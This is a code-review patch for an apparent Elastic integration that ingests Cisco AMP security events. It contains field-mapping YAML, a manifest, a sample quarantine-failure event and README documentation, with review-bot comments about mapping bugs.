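Review bot: The three `related.hash` appends for the process hashes in the Related Mapping section test the wrong field: the Process Mapping renames place the parent hashes at `process.hash.*`, but the conditions check `ctx?.process?.parent?.hash?.sha256` (and `.md5`, `.sha1`), which nothing in this pipeline sets, so process hashes never reach `related.hash` — the expected output for the OUTLOOK.EXE event earlier in this patch shows `process.hash.sha256` populated while `related.hash` holds only the file hash. Change each condition to match the value it appends, e.g. `if: ctx?.process?.hash?.sha256 != null`. The three appends that read `cisco.amp.network_info.parent.identity.*` are likewise unreachable, since those fields have already been renamed to `process.hash.*` above; once the conditions are fixed they can be dropped. The `cisco.amp.file.parent.identity.md5` rename is also listed twice in the Process Mapping section, and the second copy is a no-op that should go.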
@@ -0,0 +1,198 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + 
diff --git a/packages/cisco_amp/data_stream/log/fields/base-fields.yml b/packages/cisco_amp/data_stream/log/fields/base-fields.yml
new file mode 100644
index 00000000000..51e5fe98f8e
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/base-fields.yml
@@ -0,0 +1,46 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: "@timestamp"
+ type: date
+ description: Event timestamp.
+- name: event.module
+ type: constant_keyword
+ description: Event module
+ value: cisco_amp
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset
+ value: cisco_amp.log
+- name: container.id
+ description: Unique container id.
+ ignore_above: 1024
+ type: keyword
+- name: input.type
+ description: Type of Filebeat input.
+ type: keyword
+- name: log.file.path
+ description: Full path to the log file this event came from.
+ example: /var/log/fun-times.log
+ ignore_above: 1024
+ type: keyword
+- name: log.source.address
+ description: Source address from which the log event was read / sent from.
+ type: keyword
+- name: log.flags
+ description: Flags for the log file.
+ type: keyword
+- name: log.offset
+ description: Offset of the entry in the log file.
+ type: long
+- name: tags
+ description: List of keywords used to tag each event.
+ example: '["production", "env2"]'
+ ignore_above: 1024
+ type: keyword
diff --git a/packages/cisco_amp/data_stream/log/fields/ecs.yml b/packages/cisco_amp/data_stream/log/fields/ecs.yml
new file mode 100644
index 00000000000..e8a6e3c5dae
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/ecs.yml
@@ -0,0 +1,84 @@
+- name: '@timestamp'
+ external: ecs
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.action
+- external: ecs
+ name: event.code
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.outcome
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.id
+- external: ecs
+ name: event.timezone
+- name: related.ip
+ external: ecs
+- name: related.user
+ external: ecs
+- name: related.hosts
+ external: ecs
+- name: related.hash
+ external: ecs
+- name: process.name
+ external: ecs
+- name: process.pid
+ external: ecs
+- name: process.hash.md5
+ external: ecs
+- name: process.hash.sha1
+ external: ecs
+- name: process.hash.sha256
+ external: ecs
+- name: file.hash.md5
+ external: ecs
+- name: file.hash.sha1
+ external: ecs
+- name: file.hash.sha256
+ external: ecs
+- name: file.name
+ external: ecs
+- name: file.path
+ external: ecs
+- external: ecs
+ name: destination.address
+- external: ecs
+ name: destination.as.number
+- external: ecs
+ name: destination.as.organization.name
+- external: ecs
+ name: destination.domain
+- external: ecs
+ name: destination.geo.continent_name
+- external: ecs
+ name: destination.geo.country_iso_code
+- external: ecs
+ name: destination.geo.city_name
+- external: ecs
+ name: destination.geo.country_name
+- description: Longitude and latitude.
+ level: core
+ name: destination.geo.location
+ type: geo_point
+- external: ecs
+ name: destination.ip
+- external: ecs
+ name: destination.port
+- external: ecs
+ name: network.direction
+- external: ecs
+ name: network.transport
+- external: ecs
+ name: source.ip
+- external: ecs
+ name: source.port
diff --git a/packages/cisco_amp/data_stream/log/fields/fields.yml b/packages/cisco_amp/data_stream/log/fields/fields.yml
new file mode 100644
index 00000000000..e67370745fb
--- /dev/null
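Review bot: `event.kind` is set by the pipeline (the sample event in this patch carries `"kind": "alert"`) but is not declared in this file, so it will be mapped dynamically instead of taking the ECS definition the package otherwise pins; add `- external: ecs` / `name: event.kind` next to the other `event.*` entries. `destination.geo.location` is the only entry spelled out inline (description, level, type) while every sibling uses `external: ecs`; unless a deliberate override is intended, `- external: ecs` / `name: destination.geo.location` keeps it in step with the referenced ECS version.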
+++ b/packages/cisco_amp/data_stream/log/fields/fields.yml 
@@ -0,0 +1,292 @@
+- name: cisco.amp
+ type: group
+ release: beta
+ default_field: false
+ description: >
+ Module for parsing Cisco AMP logs.
+
+ fields:
+ - name: timestamp_nanoseconds
+ type: date
+ description: >
+ The timestamp in Epoch nanoseconds.
+
+ - name: event_type_id
+ type: long
+ description: >
+ A sub ID of the event, depending on event type.
+
+ - name: detection
+ type: keyword
+ description: >
+ The name of the malware detected.
+
+ - name: detection_id
+ type: keyword
+ description: >
+ The ID of the detection.
+
+ - name: connector_guid
+ type: keyword
+ description: >
+ The GUID of the connector sending information to AMP.
+
+ - name: group_guids
+ type: keyword
+ description: >
+ An array of group GUIDS related to the connector sending information to AMP.
+
+ - name: vulnerabilities
+ type: flattened
+ description: >
+ An array of related vulnerabilities to the malicious event.
+
+ - name: scan.description
+ type: keyword
+ description: >
+ Description of an event related to a scan being initiated, for example the specific directory name.
+
+ - name: scan.clean
+ type: boolean
+ description: >
+ Boolean value if a scanned file was clean or not.
+
+ - name: scan.scanned_files
+ type: long
+ description: >
+ Count of files scanned in a directory.
+
+ - name: scan.scanned_processes
+ type: long
+ description: >
+ Count of processes scanned related to a single scan event.
+
+ - name: scan.scanned_paths
+ type: long
+ description: >
+ Count of different directories scanned related to a single scan event.
+
+ - name: scan.malicious_detections
+ type: long
+ description: >
+ Count of malicious files or documents detected related to a single scan event.
+
+ - name: computer.connector_guid
+ type: keyword
+ description: >
+ The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved.
+
+ - name: computer.external_ip
+ type: ip
+ description: >
+ The external IP of the related host.
+
+ - name: computer.active
+ type: boolean
+ description: >
+ If the current endpoint is active or not.
+
+ - name: computer.network_addresses
+ type: flattened
+ description: >
+ All network interface information on the related host.
+
+ - name: file.disposition
+ type: keyword
+ description: >
+ Categorization of file, for example "Malicious" or "Clean".
+
+ - name: network_info.disposition
+ type: keyword
+ description: >
+ Categorization of a network event related to a file, for example "Malicious" or "Clean".
+
+ - name: network_info.nfm.direction
+ type: keyword
+ description: >
+ The current direction based on source and destination IP.
+
+ - name: related.mac
+ type: keyword
+ description: >
+ An array of all related MAC addresses.
+
+ - name: related.cve
+ type: keyword
+ description: >
+ An array of all related CVEs
+
+ - name: cloud_ioc.description
+ type: keyword
+ description: >
+ Description of the related IOC for specific IOC events from AMP.
+
+ - name: cloud_ioc.short_description
+ type: keyword
+ description: >
+ Short description of the related IOC for specific IOC events from AMP.
+
+ - name: network_info.parent.disposition
+ type: keyword
+ description: >
+ Categorization of a IOC for example "Malicious" or "Clean".
+
+ - name: network_info.parent.identity.md5
+ type: keyword
+ description: >
+ MD5 hash of the related IOC.
+
+ - name: network_info.parent.identity.sha1
+ type: keyword
+ description: >
+ SHA1 hash of the related IOC.
+
+ - name: network_info.parent.identify.sha256
+ type: keyword
+ description: >
+ SHA256 hash of the related IOC.
+
+ - name: file.archived_file.disposition
+ type: keyword
+ description: >
+ Categorization of a file archive related to a file, for example "Malicious" or "Clean".
+
+ - name: file.archived_file.identity.md5
+ type: keyword
+ description: >
+ MD5 hash of the archived file related to the malicious event.
+
+ - name: file.archived_file.identity.sha1
+ type: keyword
+ description: >
+ SHA1 hash of the archived file related to the malicious event.
+
+ - name: file.archived_file.identity.sha256
+ type: keyword
+ description: >
+ SHA256 hash of the archived file related to the malicious event.
+
+ - name: file.attack_details.application
+ type: keyword
+ description: >
+ The application name related to Exploit Prevention events.
+
+ - name: file.attack_details.attacked_module
+ type: keyword
+ description: >
+ Path to the executable or dll that was attacked and detected by Exploit Prevention.
+
+ - name: file.attack_details.base_address
+ type: keyword
+ description: >
+ The base memory address related to the exploit detected.
+
+ - name: file.attack_details.suspicious_files
+ type: keyword
+ description: >
+ An array of related files when an attack is detected by Exploit Prevention.
+
+ - name: file.parent.disposition
+ type: keyword
+ description: >
+ Categorization of parrent, for example "Malicious" or "Clean".
+
+ - name: error.description
+ type: keyword
+ description: >
+ Description of an endpoint error event.
+
+ - name: error.error_code
+ type: long
+ description: >
+ The error code describing the related error event.
+
+ - name: threat_hunting.severity
+ type: keyword
+ description: >
+ Severity result of the threat hunt registered to the malicious event. Can be Low-Critical.
+
+ - name: threat_hunting.incident_report_guid
+ type: keyword
+ description: >
+ The GUID of the related threat hunting report.
+
+ - name: threat_hunting.incident_hunt_guid
+ type: keyword
+ description: >
+ The GUID of the related investigation tracking issue.
+
+ - name: threat_hunting.incident_title
+ type: keyword
+ description: >
+ Title of the incident related to the threat hunting activity.
+
+ - name: threat_hunting.incident_summary
+ type: keyword
+ description: >
+ Summary of the outcome on the threat hunting activity.
+
+ - name: threat_hunting.incident_remediation
+ type: keyword
+ description: >
+ Recommendations to resolve the vulnerability or exploited host.
+
+ - name: threat_hunting.incident_id
+ type: long
+ description: >
+ The id of the related incident for the threat hunting activity.
+
+ - name: threat_hunting.incident_end_time
+ type: date
+ description: >
+ When the threat hunt finalized or closed.
+
+ - name: threat_hunting.incident_start_time
+ type: date
+ description: >
+ When the threat hunt was initiated.
+
+ - name: file.attack_details.indicators
+ type: flattened
+ description: >
+ Different indicator types that matches the exploit detected, for example different MITRE tactics.
+
+ - name: threat_hunting.tactics
+ type: flattened
+ description: >
+ List of all MITRE tactics related to the incident found.
+
+ - name: threat_hunting.techniques
+ type: flattened
+ description: >
+ List of all MITRE techniques related to the incident found.
+
+ - name: tactics
+ type: flattened
+ description: >
+ List of all MITRE tactics related to the incident found.
+
+ - name: mitre_tactics
+ type: keyword
+ description: >
+ Array of all related mitre tactic ID's
+
+ - name: techniques
+ type: flattened
+ description: >
+ List of all MITRE techniques related to the incident found.
+
+ - name: mitre_techniques
+ type: keyword
+ description: >
+ Array of all related mitre technique ID's
+
+ - name: command_line.arguments
+ type: keyword
+ description: >
+ The CLI arguments related to the Cloud Threat IOC reported by Cisco.
+
+ - name: bp_data
+ type: flattened
+ description: >-
+ Endpoint isolation information
diff --git a/packages/cisco_amp/data_stream/log/manifest.yml b/packages/cisco_amp/data_stream/log/manifest.yml
new file mode 100644
index 00000000000..7eef1317b6d
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/manifest.yml
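Review bot: `network_info.parent.identify.sha256` breaks the `network_info.parent.identity.*` family that its md5 and sha1 siblings use (and the generated README table in this patch repeats the typo), so a document that carries the SHA256 under `identity` would be mapped dynamically rather than by this definition; it should read `- name: network_info.parent.identity.sha256`. `timestamp_nanoseconds` is mapped as `date` but described as "Epoch nanoseconds"; the raw event in sample_event.json shows `timestamp_nanoseconds: 166000000` next to `timestamp: 1610635265`, which looks like a sub-second fraction that a `date` mapping would read as epoch milliseconds — if the pipeline keeps this field, `type: long` with a description such as `Nanosecond fraction of the event timestamp.` seems closer, though the pipeline is outside this hunk. This group is also tagged `release: beta` while the data stream manifest in the same patch says `release: experimental`; the two should agree.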
@@ -0,0 +1,92 @@
+title: Cisco AMP logs
+release: experimental
+type: logs
+streams:
+ - input: httpjson
+ vars:
+ - name: client_id
+ type: text
+ title: Client ID
+ description: Cisco AMP Client ID
+ multi: false
+ required: true
+ show_user: true
+ - name: api_key
+ type: password
+ title: API Key
+ description: Cisco AMP API Key
+ multi: false
+ required: true
+ show_user: true
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ multi: false
+ required: false
+ show_user: true
+ default: 60s
+ - name: interval
+ type: text
+ title: Interval
+ multi: false
+ required: true
+ show_user: true
+ description: Interval at which the logs will be pulled. The value must be between 2m and 1h.
+ default: 1h
+ - name: url
+ type: text
+ title: API URL.
+ description: The API URL
+ multi: false
+ required: true
+ show_user: false
+ default: https://api.amp.cisco.com/v1/events?offset=0&limit=300
+ - name: limit
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: false
+ description: Max number of logs pulled on each request
+ default: 100
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: true
+ description: Initial Interval for first log pull
+ default: 24h
+ - name: ssl
+ type: yaml
+ title: SSL
+ multi: false
+ required: false
+ show_user: false
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: true
+ default:
+ - cisco-amp
+ - forwarded
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: "Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. 
\nThis executes in the agent before the logs are parsed. \nSee [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.\n"
+ template_path: httpjson.yml.hbs
+ title: Cisco AMP logs
+ description: Collect Cisco AMP logs via the API
diff --git a/packages/cisco_amp/data_stream/log/sample_event.json b/packages/cisco_amp/data_stream/log/sample_event.json
new file mode 100644
index 00000000000..1f71f309e9b
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/sample_event.json
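Review bot: The hidden `url` default `https://api.amp.cisco.com/v1/events?offset=0&limit=300` bakes both paging parameters into the URL even though a separate `limit` var (default 100) is declared right below it, so whatever paging the httpjson template appends will duplicate or contradict the query string; `default: https://api.amp.cisco.com/v1/events` with paging left to the template vars is cleaner. The same var is `show_user: false`, yet the sample event's own links point at `api.eu.amp.cisco.com`, so EU/APJC tenants must discover a hidden setting before any events arrive — consider `show_user: true` or a description that names the regional hosts. The `limit` var's title is `Initial Interval`, copied from the var after it; it should be `title: Limit`. The `interval` description promises a 2m–1h range that nothing in this file enforces; the template that consumes it is outside this hunk, so that may be handled there.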
@@ -0,0 +1,75 @@ +{ + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094015339Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": 
"6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419229327140847663", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] +} \ No newline at end of file diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md new file mode 100644 index 00000000000..4a510396534 --- /dev/null +++ b/packages/cisco_amp/docs/README.md 
@@ -0,0 +1,236 @@ +# Cisco AMP Integration + +This integration is for Cisco AMP logs. It includes the following +datasets for receiving logs over syslog or read from a file: + +- `log` dataset: supports Cisco AMP logs. + +## Logs + +### AMP + +The `log` dataset collects Cisco AMP logs. + +An example event for `log` looks as following: + +```json +{ + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094015339Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419229327140847663", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date | +| cisco.amp.bp_data | Endpoint isolation information | flattened | +| cisco.amp.cloud_ioc.description | Description of the related IOC for specific IOC events from AMP. 
| keyword | +| cisco.amp.cloud_ioc.short_description | Short description of the related IOC for specific IOC events from AMP. | keyword | +| cisco.amp.command_line.arguments | The CLI arguments related to the Cloud Threat IOC reported by Cisco. | keyword | +| cisco.amp.computer.active | If the current endpoint is active or not. | boolean | +| cisco.amp.computer.connector_guid | The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. | keyword | +| cisco.amp.computer.external_ip | The external IP of the related host. | ip | +| cisco.amp.computer.network_addresses | All network interface information on the related host. | flattened | +| cisco.amp.connector_guid | The GUID of the connector sending information to AMP. | keyword | +| cisco.amp.detection | The name of the malware detected. | keyword | +| cisco.amp.detection_id | The ID of the detection. | keyword | +| cisco.amp.error.description | Description of an endpoint error event. | keyword | +| cisco.amp.error.error_code | The error code describing the related error event. | long | +| cisco.amp.event_type_id | A sub ID of the event, depending on event type. | long | +| cisco.amp.file.archived_file.disposition | Categorization of a file archive related to a file, for example "Malicious" or "Clean". | keyword | +| cisco.amp.file.archived_file.identity.md5 | MD5 hash of the archived file related to the malicious event. | keyword | +| cisco.amp.file.archived_file.identity.sha1 | SHA1 hash of the archived file related to the malicious event. | keyword | +| cisco.amp.file.archived_file.identity.sha256 | SHA256 hash of the archived file related to the malicious event. | keyword | +| cisco.amp.file.attack_details.application | The application name related to Exploit Prevention events. | keyword | +| cisco.amp.file.attack_details.attacked_module | Path to the executable or dll that was attacked and detected by Exploit Prevention. 
| keyword | +| cisco.amp.file.attack_details.base_address | The base memory address related to the exploit detected. | keyword | +| cisco.amp.file.attack_details.indicators | Different indicator types that matches the exploit detected, for example different MITRE tactics. | flattened | +| cisco.amp.file.attack_details.suspicious_files | An array of related files when an attack is detected by Exploit Prevention. | keyword | +| cisco.amp.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword | +| cisco.amp.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword | +| cisco.amp.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword | +| cisco.amp.mitre_tactics | Array of all related mitre tactic ID's | keyword | +| cisco.amp.mitre_techniques | Array of all related mitre technique ID's | keyword | +| cisco.amp.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword | +| cisco.amp.network_info.nfm.direction | The current direction based on source and destination IP. | keyword | +| cisco.amp.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword | +| cisco.amp.network_info.parent.identify.sha256 | SHA256 hash of the related IOC. | keyword | +| cisco.amp.network_info.parent.identity.md5 | MD5 hash of the related IOC. | keyword | +| cisco.amp.network_info.parent.identity.sha1 | SHA1 hash of the related IOC. | keyword | +| cisco.amp.related.cve | An array of all related CVEs | keyword | +| cisco.amp.related.mac | An array of all related MAC addresses. | keyword | +| cisco.amp.scan.clean | Boolean value if a scanned file was clean or not. | boolean | +| cisco.amp.scan.description | Description of an event related to a scan being initiated, for example the specific directory name. 
| keyword | +| cisco.amp.scan.malicious_detections | Count of malicious files or documents detected related to a single scan event. | long | +| cisco.amp.scan.scanned_files | Count of files scanned in a directory. | long | +| cisco.amp.scan.scanned_paths | Count of different directories scanned related to a single scan event. | long | +| cisco.amp.scan.scanned_processes | Count of processes scanned related to a single scan event. | long | +| cisco.amp.tactics | List of all MITRE tactics related to the incident found. | flattened | +| cisco.amp.techniques | List of all MITRE techniques related to the incident found. | flattened | +| cisco.amp.threat_hunting.incident_end_time | When the threat hunt finalized or closed. | date | +| cisco.amp.threat_hunting.incident_hunt_guid | The GUID of the related investigation tracking issue. | keyword | +| cisco.amp.threat_hunting.incident_id | The id of the related incident for the threat hunting activity. | long | +| cisco.amp.threat_hunting.incident_remediation | Recommendations to resolve the vulnerability or exploited host. | keyword | +| cisco.amp.threat_hunting.incident_report_guid | The GUID of the related threat hunting report. | keyword | +| cisco.amp.threat_hunting.incident_start_time | When the threat hunt was initiated. | date | +| cisco.amp.threat_hunting.incident_summary | Summary of the outcome on the threat hunting activity. | keyword | +| cisco.amp.threat_hunting.incident_title | Title of the incident related to the threat hunting activity. | keyword | +| cisco.amp.threat_hunting.severity | Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. | keyword | +| cisco.amp.threat_hunting.tactics | List of all MITRE tactics related to the incident found. | flattened | +| cisco.amp.threat_hunting.techniques | List of all MITRE techniques related to the incident found. | flattened | +| cisco.amp.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. 
| date | +| cisco.amp.vulnerabilities | An array of related vulnerabilities to the malicious event. | flattened | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or 